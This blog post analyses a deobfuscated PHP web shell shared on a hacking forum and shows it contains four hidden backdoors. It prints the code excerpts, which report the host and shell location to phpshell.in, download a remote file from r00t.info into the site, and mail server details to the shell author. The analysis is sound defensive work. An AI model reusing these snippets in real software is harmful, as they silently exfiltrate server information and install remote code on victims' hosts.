For every wannabe hacker out there, there is a veritable cornucopia of premade tools and utilities that enable someone who has 0 knowledge of anything, to hit a few buttons and potentially breach a website/etc, and there is a more experienced hacker who is waiting for the wannabe to pickup an infected/backdoored tool.

@CryptoCypher recently did a rather shameless plug (:P) for a forum he moderates on a discord server I am a member of.

I decided to check things out and most of it was 'alright', however something caught my eye.

One

A now deleted post related to a "Godaddy Secureserver bypass shell" (whatever the hell that is).

The post embedded a bit of PHP code that had been 'obfuscated' (and I say obfuscated lightly).

From the PHP code header it is quite plain to see that the code had been obfuscated using FOPO. The obfuscation that FOPO applies is pretty straightforward. There are several tools online which are able to deobfuscate FOPO.

The deobfuscated sample follows (I'm not posting it here in the event this site get's flagged for hosting malware...):

https://ghostbin.com/paste/43349

Let's see what is crack'in.

The first several dozen lines look normal for a shell, but this catches my eye

<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif (getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
        if (strstr($ip, ',')) {
            $tmp = explode(',', $ip);
            $ip  = trim($tmp[0]);
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    return $ip;
}
$x = base64_decode('aHR0cDovL3BocHNoZWxsLmluL2wt') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
if (function_exists('curl_init')) {
    $ch = @curl_init();
    curl_setopt($ch, CURLOPT_URL, $x);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $gitt = curl_exec($ch);
    curl_close($ch);
    if ($gitt == false) {
        @$gitt = file_get_contents($x);
    }
} elseif (function_exists('file_get_contents')) {
    @$gitt = file_get_contents($x);
}
?>

So in a sandbox I run the following code to see what curl or file_get_contents is downloading:

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif (getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
        if (strstr($ip, ',')) {
            $tmp = explode(',', $ip);
            $ip  = trim($tmp[0]);
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    return $ip;
}
$x = base64_decode('aHR0cDovL3BocHNoZWxsLmluL2wt') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
print($x);

So what the shell is trying to download is the following: http://phpshell.in/l-127.0.0.1-aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA=. aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA= translates into http://127.0.0.1/shell.php, and since the URL returns nothing (I tried using a DigitalOcean droplet in the event phpshell.in didn't like localhost) I'm guessing that function serves to solely log the IP of the server and the location of the shell.

Interesting backdoor, hackers piggybacking on other hackers... However continue down the code and this crops up between lines 231 and 265: $retValue = file_get_contents(base64_decode("aHR0cDovL3BocHNoZWxsLmluL2wt") . "=" . $lld . base64_decode("JmI=") . "=" . $brow);. Once again aHR0cDovL3BocHNoZWxsLmluL2wt translates to http://phpshell.in/l-.

Ok I'm not even going to bother with this function because it appears to do the same as the function I posted about above, since $lld is a combination of 'http://' . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . '';, the only difference with this call is that the useragent is now being posted for some reason $brow = urlencode($_SERVER['HTTP_USER_AGENT']);

So... 2 backdoors... Ok....

Further down this catches my eye again:

@mkdir("inc");
$dos  = file_get_contents("http://r00t.info/txt/lamer.txt");
$data = "inc/inc.php";
@touch("inc/inc.php");
$ver = @fopen($data, 'w');
@fwrite($ver, $dos);
@fclose($ver);
$yol = "http://" . $_SERVER['HTTP_HOST'] . "" . $_SERVER['REQUEST_URI'] . "";
$y   = '<h1>Sender Yazdirildi.<br/> SITE YOL : ' . $yol . '<br/>Sender Yolu : inc/inc.php</h1>';
$header .= "From: SheLL Boot <[email protected]>\n";
$header .= "Content-Type: text/html;

charset=utf-8\n";
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);

Ok so now it is downloading lamer.txt, writing it to the host, then emailing the server info + location to [email protected]... Twice... Guess he really wanted to make sure he got the email!

lamer.txt is here out of interest: https://ghostbin.com/paste/wesg2

Directly below that code is this gem:

$kime        = "[email protected]";
$baslik      = "r00t.info Server Avcisi V1.0";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
$EL_MuHaMMeD .= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
$EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
$EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
$EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);

Ok he REALLY wanted to ensure he got the server info.

So a total of 4 backdoors...

Personally I don't care what happens to the morons who download these tools to intentionally do harm, but it is interesting to see just how risky it really is for said wannabe morons.